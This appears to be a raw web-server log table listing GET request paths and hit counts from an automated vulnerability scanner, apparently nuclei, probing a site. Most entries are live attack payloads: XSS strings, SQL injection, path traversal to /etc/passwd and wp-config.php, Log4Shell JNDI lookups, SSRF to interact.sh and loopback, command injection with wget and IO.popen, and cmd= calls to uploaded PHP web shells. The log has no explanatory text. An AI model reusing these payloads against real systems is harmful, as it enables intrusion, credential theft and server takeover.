HTTP/1.1 |
2 | GET | /44.234.sql.xz |
HTTP/1.1 |
2 | GET | /44.234.sql.z |
HTTP/1.1 |
2 | GET | /44.234.sql.zip |
HTTP/1.1 |
1 | GET | /44.234.sqlite |
HTTP/1.1 |
1 | GET | /44.234.sqlitedb |
HTTP/1.1 |
2 | GET | /44.234.tar.gz |
HTTP/1.1 |
1 | GET | /44.234.tar.z |
HTTP/1.1 |
1 | GET | /44.234.xz |
HTTP/1.1 |
1 | GET | /44.234.z |
HTTP/1.1 |
1 | GET | /44.234.zip |
HTTP/1.1 |
2 | GET | /44.7z |
HTTP/1.1 |
2 | GET | /44.bz2 |
HTTP/1.1 |
1 | GET | /44.db |
HTTP/1.1 |
1 | GET | /44.gz |
HTTP/1.1 |
2 | GET | /44.lz |
HTTP/1.1 |
2 | GET | /44.rar |
HTTP/1.1 |
2 | GET | /44.sql.7z |
HTTP/1.1 |
2 | GET | /44.sql.bz2 |
HTTP/1.1 |
1 | GET | /44.sql.gz |
HTTP/1.1 |
2 | GET | /44.sql.lz |
HTTP/1.1 |
2 | GET | /44.sql.rar |
HTTP/1.1 |
2 | GET | /44.sql.tar.gz |
HTTP/1.1 |
2 | GET | /44.sql.tar.z |
HTTP/1.1 |
1 | GET | /44.sql.xz |
HTTP/1.1 |
2 | GET | /44.sql.z |
HTTP/1.1 |
1 | GET | /44.sql.zip |
HTTP/1.1 |
2 | GET | /44.sqlite |
HTTP/1.1 |
2 | GET | /44.sqlitedb |
HTTP/1.1 |
1 | GET | /44.tar.gz |
HTTP/1.1 |
2 | GET | /44.tar.z |
HTTP/1.1 |
2 | GET | /44.xz |
HTTP/1.1 |
2 | GET | /44.z |
HTTP/1.1 |
2 | GET | /44.zip |
HTTP/1.1 |
1 | GET | /58xmBYF4zsVCverKNny9auhEPHN |
HTTP/1.1 |
1 | GET | /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E |
HTTP/1.1 |
1 | GET | /?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_id=2 |
HTTP/1.1 |
1 | GET | /?/AdminAppData@no-mobile-0/0/15503332983847185/ |
HTTP/1.1 |
2 | GET | /?2LNn5a3OJE7crTUgjixBXUoaaAV=9 |
HTTP/1.1 |
2 | GET | /?BazaR&vue=consulter |
HTTP/1.1 |
2 | GET | /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 |
HTTP/1.1 |
2 | GET | /?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E |
HTTP/1.1 |
2 | GET | /?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- |
HTTP/1.1 |
1 | GET | /?a=display&templateFile=README.md |
HTTP/1.1 |
1 | GET | /?aam-media=wp-config.php |
HTTP/1.1 |
1 | GET | /?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E |
HTTP/1.1 |
1 | GET | /?action=command&command=set_city_timezone&value=$(wget%20http[:]//)) |
HTTP/1.1 |
1 | GET | /?action=edit&fileName=..\\..\\..\\windows\\win.ini&h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf |
HTTP/1.1 |
1 | GET | /?action=http[:]///&email=root@&from=http[:]///&host&href=http[:]///&http_host&load=http[:]///&preview=http[:]///&proxy=http[:]///&ref=http[:]///&referrer=http[:]///&src=http[:]///&target=http[:]///&u=http[:]///&url=http[:]/// |
HTTP/1.1 |
1 | GET | /?address_lat&address_lng&distance=10&lcats%5B%5D&location_search&nearby=off&search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= |
HTTP/1.1 |
1 | GET | /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E |
HTTP/1.1 |
1 | GET | /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
4 | GET | /?author=1 |
HTTP/1.1 |
1 | GET | /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE |
HTTP/1.1 |
1 | GET | /?class.module.classLoader.resources.context.configFile=http[:]//&class.module.classLoader.resources.context.configFile.content.aaa=xxx |
HTTP/1.1 |
1 | GET | /?ct_baths_plus&ct_beds_plus&ct_brokerage=0&ct_city&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_keyword&ct_lotsize_from&ct_lotsize_to&ct_mls&ct_mobile_keyword&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_year_from&ct_year_to&ct_zipcode&lat&lng&search-listings=true |
HTTP/1.1 |
1 | GET | /?errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_id=0 |
HTTP/1.1 |
1 | GET | /?feed=rss2 |
HTTP/1.1 |
1 | GET | /?file=http[:]//0177[.]0[.]0[.]1/etc/passwd |
HTTP/1.1 |
1 | GET | /?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /?function=call_user_func_array&s=index/think\\app/invokefunction&vars[0]=phpinfo&vars[1][]=1 |
HTTP/1.1 |
1 | GET | /?host=http[:]//0177[.]0[.]0[.]1/server-status |
HTTP/1.1 |
1 | GET | /?id=nuclei%25{128*128} |
HTTP/1.1 |
2 | GET | /?invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+&page=pie-register&show_dash_widget=1 |
HTTP/1.1 |
1 | GET | /?item_id=0%20union%20select%20sleep(5)%20--%20g&rest_route=/wc/v3/wishlist/remove_product/1 |
HTTP/1.1 |
1 | GET | /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E |
HTTP/1.1 |
1 | GET | /?locale=en |
HTTP/1.1 |
1 | GET | /?location=search |
HTTP/1.1 |
2 | GET | /?mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&mapp_iframe=1 |
HTTP/1.1 |
2 | GET | /?mdocs-img-preview=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /?mp_idx=%22alert(%271%27)// |
HTTP/1.1 |
1 | GET | /?p=1&xsg-format=yyy&xsg-page=pp&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-type=zz |
HTTP/1.1 |
1 | GET | /?p=1 |
HTTP/1.1 |
1 | GET | /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini |
HTTP/1.1 |
1 | GET | /?page=step_1 |
HTTP/1.1 |
1 | GET | /?patreon_action=serve_patron_only_image&patron_only_image=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /?pid=0&uid=0&url=test&visitorId=1331'+and+sleep(5)+or+'&wmcAction=wmcTrack |
HTTP/1.1 |
1 | GET | /?post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g&rest_route=/pvc/v1/increase/1 |
HTTP/1.1 |
2 | GET | /?pp=env |
HTTP/1.1 |
1 | GET | /?pretty |
HTTP/1.1 |
1 | GET | /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 |
HTTP/1.1 |
2 | GET | /?q=admin/views/ajax/autocomplete/user/a |
HTTP/1.1 |
2 | GET | /?q=views/ajax/autocomplete/user/a |
HTTP/1.1 |
1 | GET | /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini |
HTTP/1.1 |
1 | GET | /?redirect=https[:]//interact[.]sh/&wptouch_switch=desktop |
HTTP/1.1 |
1 | GET | /?rest_route=/wp/v2/users/ |
HTTP/1.1 |
2 | GET | /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E |
HTTP/1.1 |
1 | GET | /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 |
HTTP/1.1 |
1 | GET | /?score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&subreddit=news |
HTTP/1.1 |
1 | GET | /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini |
HTTP/1.1 |
1 | GET | /?url=http[:]//0177[.]0[.]0[.]1/server-status |
HTTP/1.1 |
2 | GET | /?url=http[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /?view=log |
HTTP/1.1 |
1 | GET | /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v |
HTTP/1.1 |
1 | GET | /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /?wsdl |
HTTP/1.1 |
1 | GET | /?x=${jndi:ldap://${hostName}.uri./a} |
HTTP/1.1 |
1 | GET | /?x=${jndi:ldap://127[.]0[.]0[.]1 |
HTTP/1.1 |
1 | GET | /?{alert(1)} |
HTTP/1.1 |
1 | GET | /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../etc/passwd&type=uploadfile |
HTTP/1.1 |
1 | GET | /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../windows/win.ini&type=uploadfile |
HTTP/1.1 |
2 | GET | /ADSearch.cc?methodToCall=search |
HTTP/1.1 |
1 | GET | /ALFA_DATA/alfacgiapi/ |
HTTP/1.1 |
1 | GET | /Account/Login |
HTTP/1.1 |
1 | GET | /Admin/Access/default.aspx |
HTTP/1.1 |
2 | GET | /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /Admin |
HTTP/1.1 |
1 | GET | /AirWatch/Login |
HTTP/1.1 |
2 | GET | /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /Assets/temp/hotspot/img/logohotspot.txt |
HTTP/1.1 |
1 | GET | /Audio/1/hls/..%255C..%255C..%255C..%255C..%255C..%255CWindows%255Cwin.ini/stream.mp3/ |
HTTP/1.1 |
1 | GET | /AvalancheWeb/image?imageFilePath=C:/windows/win.ini |
HTTP/1.1 |
1 | GET | /BSW_cxttongr.htm |
HTTP/1.1 |
2 | GET | /BitKeeper/etc/config |
HTTP/1.1 |
1 | GET | /CACHE/sdesktop/data.xml |
HTTP/1.1 |
1 | GET | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en |
HTTP/1.1 |
1 | GET | /CFIDE/administrator/images/background.jpg |
HTTP/1.1 |
1 | GET | /CFIDE/administrator/images/componentutilslogin.jpg |
HTTP/1.1 |
1 | GET | /CFIDE/componentutils/login.cfm |
HTTP/1.1 |
2 | GET | /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /CHANGELOG.md |
HTTP/1.1 |
2 | GET | /CMSInstall/install.aspx |
HTTP/1.1 |
1 | GET | /CMSPages/GetDocLink.ashx?link=https[:]//interact[.]sh/ |
HTTP/1.1 |
2 | GET | /CMSPages/logon.aspx |
HTTP/1.1 |
2 | GET | /Cargo.lock |
HTTP/1.1 |
2 | GET | /Cargo.toml |
HTTP/1.1 |
1 | GET | /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A |
HTTP/1.1 |
1 | GET | /CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\"><script>alert(document.domain)</script> |
HTTP/1.1 |
1 | GET | /DLPCenter/images/favicon.ico |
HTTP/1.1 |
2 | GET | /DLPCenter/loginform.sms |
HTTP/1.1 |
2 | GET | /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
2 | GET | /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
2 | GET | /DnnImageHandler.ashx?mode=file&url=http[:]// |
HTTP/1.1 |
1 | GET | /Dockerrun.aws.json |
HTTP/1.1 |
1 | GET | /EMSWebClient/Login.aspx |
HTTP/1.1 |
1 | GET | /ESPEasy |
HTTP/1.1 |
1 | GET | /Electron/download/windows/%5Cwindows%5Cwin.ini |
HTTP/1.1 |
1 | GET | /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json |
HTTP/1.1 |
1 | GET | /FileZilla.xml |
HTTP/1.1 |
1 | GET | /GDSHost/Default.aspx |
HTTP/1.1 |
2 | GET | /GallerySite/filesrc/fotoilan/388/middle//.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/etc/passwd |
HTTP/1.1 |
1 | GET | /Gemfile |
HTTP/1.1 |
1 | GET | /Guardfile |
HTTP/1.1 |
1 | GET | /IND780/excalweb.dll?webpage=../../AutoCE.ini |
HTTP/1.1 |
1 | GET | /Images/Remote?imageUrl=http[:]//interact[.]sh/ |
HTTP/1.1 |
2 | GET | /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion[.]Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS |
HTTP/1.1 |
1 | GET | /IntellectMain.jsp?IntellectSystem=https[:]//www[.]interact[.]sh |
HTTP/1.1 |
1 | GET | /Items/RemoteSearch/Image?ImageUrl=http[:]//interact[.]sh/&ProviderName=TheMovieDB |
HTTP/1.1 |
2 | GET | /JavaScriptServlet |
HTTP/1.1 |
1 | GET | /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E |
HTTP/1.1 |
2 | GET | /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto |
HTTP/1.1 |
1 | GET | /LTX_navi.html |
HTTP/1.1 |
1 | GET | /LetsEncrypt/Index?fileName=/etc/passwd |
HTTP/1.1 |
2 | GET | /Login.aspx |
HTTP/1.1 |
2 | GET | /Login/Login |
HTTP/1.1 |
2 | GET | /Login?!'><sVg/OnLoAD=alert 1337// |
HTTP/1.1 |
1 | GET | /MRcgi/MRentrancePage.pl |
HTTP/1.1 |
1 | GET | /Main_Login.asp |
HTTP/1.1 |
2 | GET | /MicroStrategy/ |
HTTP/1.1 |
2 | GET | /MicroStrategy/servlet/mstrWeb/ |
HTTP/1.1 |
1 | GET | /MicroStrategy/servlet/mstrWebAdmin/ |
HTTP/1.1 |
1 | GET | /MicroStrategy/servlet/mstrWebAdmin |
HTTP/1.1 |
1 | GET | /MicroStrategy/servlet/mstrWeb |
HTTP/1.1 |
2 | GET | /MicroStrategy/servlet/taskProc/ |
HTTP/1.1 |
1 | GET | /MicroStrategy/servlet/taskProc?srcURL=https[:]//google[.]com&taskContentType=xml&taskEnv=xml&taskId=shortURL |
HTTP/1.1 |
2 | GET | /MicroStrategy/servlet/taskProc |
HTTP/1.1 |
1 | GET | /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) |
HTTP/1.1 |
2 | GET | /MicroStrategy |
HTTP/1.1 |
1 | GET | /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /MyErrors.log |
HTTP/1.1 |
2 | GET | /NCFindWeb?filename&service=IPreAlertConfigService |
HTTP/1.1 |
1 | GET | /NON_EXISTING_PATH/ |
HTTP/1.1 |
2 | GET | /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple |
HTTP/1.1 |
1 | GET | /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh |
HTTP/1.1 |
1 | GET | /OA_HTML/ibeCAcpSSOReg.jsp |
HTTP/1.1 |
1 | GET | /OA_HTML/jtfwrepo.xml |
HTTP/1.1 |
1 | GET | /OpenAM-11.0.0/ui/PWResetUserValidation |
HTTP/1.1 |
1 | GET | /PRESENTATION/HTML/TOP/PRTINFO.HTML |
HTTP/1.1 |
2 | GET | /Pages/login.htm |
HTTP/1.1 |
2 | GET | /Pipfile.lock |
HTTP/1.1 |
1 | GET | /PolicyMgmt/policyDetailsCard.do?poID=19&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E&typeID=3 |
HTTP/1.1 |
1 | GET | /Procfile |
HTTP/1.1 |
1 | GET | /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /QH.aspx?action=download&fileName=.%2fQH.aspx&responderId=ResourceNewResponder |
HTTP/1.1 |
2 | GET | /RASHTML5Gateway/ |
HTTP/1.1 |
1 | GET | /RDWeb/Pages/en-US/login.aspx |
HTTP/1.1 |
1 | GET | /README.md |
HTTP/1.1 |
2 | GET | /README.txt |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /RestAPI/ImportTechnicians |
HTTP/1.1 |
1 | GET | /Runtime/Data/ms_admin.php |
HTTP/1.1 |
1 | GET | /SAAS/t/_/;/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /SAPIrExtHelp/random/SAPIrExtHelp/random/%2522%253e%253c%2553%2556%2547%2520%254f%254e%254c%254f%2541%2544%253d%2526%2523%2539%2537%2526%2523%2531%2530%2538%2526%2523%2531%2530%2531%2526%2523%2531%2531%2534%2526%2523%2531%2531%2536%2528%2526%2523%2578%2536%2534%2526%2523%2578%2536%2566%2526%2523%2578%2536%2533%2526%2523%2578%2537%2535%2526%2523%2578%2536%2564%2526%2523%2578%2536%2535%2526%2523%2578%2536%2565%2526%2523%2578%2537%2534%2526%2523%2578%2532%2565%2526%2523%2578%2536%2534%2526%2523%2578%2536%2566%2526%2523%2578%2536%2564%2526%2523%2578%2536%2531%2526%2523%2578%2536%2539%2526%2523%2578%2536%2565%2529%253e.asp |
HTTP/1.1 |
1 | GET | /SASLogon/login |
HTTP/1.1 |
1 | GET | /SOGo |
HTTP/1.1 |
1 | GET | /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei |
HTTP/1.1 |
1 | GET | /Setup/index.php/ |
HTTP/1.1 |
1 | GET | /Sitefinity/Authenticate/SWT |
HTTP/1.1 |
2 | GET | /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion[.]Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS |
HTTP/1.1 |
1 | GET | /Solar_AiConf.php/%2522%253E%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E |
HTTP/1.1 |
1 | GET | /Solar_History.php?command=%95%5C%8E%A6&event_level=0&event_pcs=1&record=10&search_off=on&search_on=on&sort_type=0&time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end&word=hj%27 |
HTTP/1.1 |
2 | GET | /Solar_Image.php?fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=resize |
HTTP/1.1 |
1 | GET | /Solar_Menu.php |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
2 | GET | /Telerik.Web.UI.DialogHandler.axd?dp=1 |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /Thumbs.db |
HTTP/1.1 |
1 | GET | /Trace.axd |
HTTP/1.1 |
2 | GET | /Umbraco/feedproxy.aspx?url=http[:]// |
HTTP/1.1 |
1 | GET | /Upload/test/2LNn6XboSKb1tlWq2QrDSe3f7Rn.php |
HTTP/1.1 |
1 | GET | /Uploads/2LM9cuyzpqxG6U6L98b8hmlpz2O.php7?cmd=echo+\"roxyfileman\"+|+rev |
HTTP/1.1 |
1 | GET | /Uploads/2LNn5dqgEJhB2BuJGXOjpjRQhZg.php?cmd=echo+\"roxyfileman\"+|+rev |
HTTP/1.1 |
1 | GET | /Uploads/2LNn6MOMEYQp0ur5JasNZ16cTq0.php7?cmd=echo+\"roxyfileman\"+|+rev |
HTTP/1.1 |
1 | GET | /Vagrantfile |
HTTP/1.1 |
1 | GET | /VirtualEms/Login.aspx |
HTTP/1.1 |
1 | GET | /WCC2/ |
HTTP/1.1 |
1 | GET | /WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /WebConsole/ |
HTTP/1.1 |
1 | GET | /WebInterface/login.html |
HTTP/1.1 |
1 | GET | /WebReport/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml |
HTTP/1.1 |
1 | GET | /WebReport/ReportServer |
HTTP/1.1 |
2 | GET | /WidgetHandler.ashx?ID=1&MethodName=Sort&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29&row=1 |
HTTP/1.1 |
1 | GET | /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri |
HTTP/1.1 |
2 | GET | /\\..\\..\\..\\..\\Windows\\win.ini |
HTTP/1.1 |
1 | GET | /\\u001B]8;;https[:]//interact[.]sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 |
HTTP/1.1 |
1 | GET | /_.htaccess |
HTTP/1.1 |
2 | GET | /__ |
HTTP/1.1 |
1 | GET | /__clockwork/app |
HTTP/1.1 |
2 | GET | /__clockwork/latest |
HTTP/1.1 |
1 | GET | /__swagger__/ |
HTTP/1.1 |
1 | GET | /_admin/index.html |
HTTP/1.1 |
1 | GET | /_all/_search |
HTTP/1.1 |
2 | GET | /_all_dbs |
HTTP/1.1 |
1 | GET | /_debugbar/open?max=20&offset=0 |
HTTP/1.1 |
2 | GET | /_ignition/scripts/--%3E%3Csvg%2520onload=alert%28document.domain%29%3E |
HTTP/1.1 |
1 | GET | /_netrc |
HTTP/1.1 |
1 | GET | /_next/static/../server/pages-manifest.json |
HTTP/1.1 |
1 | GET | /_notes/dwsync.xml |
HTTP/1.1 |
1 | GET | /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
4 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 |
HTTP/1.1 |
2 | GET | /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.%7D |
HTTP/1.1 |
1 | GET | /_something_.cfm |
HTTP/1.1 |
2 | GET | /_swagger_/ |
HTTP/1.1 |
1 | GET | /_users/_all_docs |
HTTP/1.1 |
1 | GET | /_vti_bin/Authentication.asmx?op=Mode |
HTTP/1.1 |
2 | GET | /_vti_bin/lists.asmx?WSDL |
HTTP/1.1 |
2 | GET | /_vti_inf.html |
HTTP/1.1 |
1 | GET | /_vti_pvt/service.cnf |
HTTP/1.1 |
1 | GET | /_vti_pvt/service.pwd |
HTTP/1.1 |
5 | GET | /_wpeprivate/config.json |
HTTP/1.1 |
1 | GET | /a.htaccess |
HTTP/1.1 |
1 | GET | /aa404bb?a</script><script>alert(/XSS/)</script> |
HTTP/1.1 |
1 | GET | /about_state |
HTTP/1.1 |
2 | GET | /access/config |
HTTP/1.1 |
1 | GET | /account/login |
HTTP/1.1 |
1 | GET | /account/register |
HTTP/1.1 |
1 | GET | /accounts/login/ |
HTTP/1.1 |
1 | GET | /accounts/login?next=/admin/ |
HTTP/1.1 |
2 | GET | /action/login.html |
HTTP/1.1 |
1 | GET | /action/usermanager.htm |
HTTP/1.1 |
2 | GET | /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} |
HTTP/1.1 |
2 | GET | /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} |
HTTP/1.1 |
2 | GET | /actuator/auditevents |
HTTP/1.1 |
1 | GET | /actuator/beans |
HTTP/1.1 |
1 | GET | /actuator/caches |
HTTP/1.1 |
1 | GET | /actuator/conditions |
HTTP/1.1 |
1 | GET | /actuator/configprops |
HTTP/1.1 |
1 | GET | /actuator/dump |
HTTP/1.1 |
1 | GET | /actuator/env |
HTTP/1.1 |
1 | GET | /actuator/favicon.ico |
HTTP/1.1 |
1 | GET | /actuator/flyway |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
2 | GET | /actuator/httptrace |
HTTP/1.1 |
1 | GET | /actuator/info |
HTTP/1.1 |
1 | GET | /actuator/jolokia/exec/com[.]sun[.]management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd |
HTTP/1.1 |
1 | GET | /actuator/jolokia/list |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/java[.]lang:type=Memory |
HTTP/1.1 |
1 | GET | /actuator/jolokia |
HTTP/1.1 |
1 | GET | /actuator/liquibase |
HTTP/1.1 |
2 | GET | /actuator/logfile |
HTTP/1.1 |
1 | GET | /actuator/loggingConfig |
HTTP/1.1 |
1 | GET | /actuator/mappings |
HTTP/1.1 |
2 | GET | /actuator/metrics |
HTTP/1.1 |
2 | GET | /actuator;/env; |
HTTP/1.1 |
1 | GET | /addons/phpmailer/phpmailer.php |
HTTP/1.1 |
1 | GET | /adjuncts/3a890183/ |
HTTP/1.1 |
